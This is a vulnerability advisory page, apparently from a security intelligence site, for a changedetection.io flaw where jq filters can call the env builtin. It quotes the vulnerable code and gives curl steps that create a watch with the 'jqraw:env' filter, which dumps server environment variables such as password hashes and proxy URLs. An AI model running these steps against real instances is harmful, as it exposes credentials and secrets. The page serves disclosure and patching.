Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-33981 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.
Vulnerable file: changedetectionio/html_tools.py, lines 380-388
User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:
if json_filter.startswith("jq:"):
jq_expression = jq.compile(json_filter.removeprefix("jq:"))
match = jq_expression.input(json_data).all()
return _get_stripped_text_from_json_match(match)
if json_filter.startswith("jqraw:"):
jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
match = jq_expression.input(json_data).all()
return '\n'.join(str(item) for item in match)
The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)) — it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.
Step 1 — Create a watch for any JSON endpoint with jqraw:env as the include filter:
curl -X POST http://target:5000/api/v1/watch \
-H "Content-Type: application/json" \
-H "x-api-key: <api-key>" \
-d '{
"url": "https://httpbin.org/json",
"include_filters": ["jqraw:env"],
"time_between_check": {"seconds": 30}
}'
If no password or API key is set (the default), no authentication is needed.
Step 2 — Wait for the watch to be checked, or trigger a recheck:
curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
Step 3 — The processed text file on disk now contains all environment variables:
{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
... and all other env vars}
The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.
Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.
SALTED_PASS (password hash used for authentication), enabling offline cracking or direct session forgeryPLAYWRIGHT_DRIVER_URL, WEBDRIVER_URL, HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variablesjq module is installed (standard in Docker deployments) is vulnerable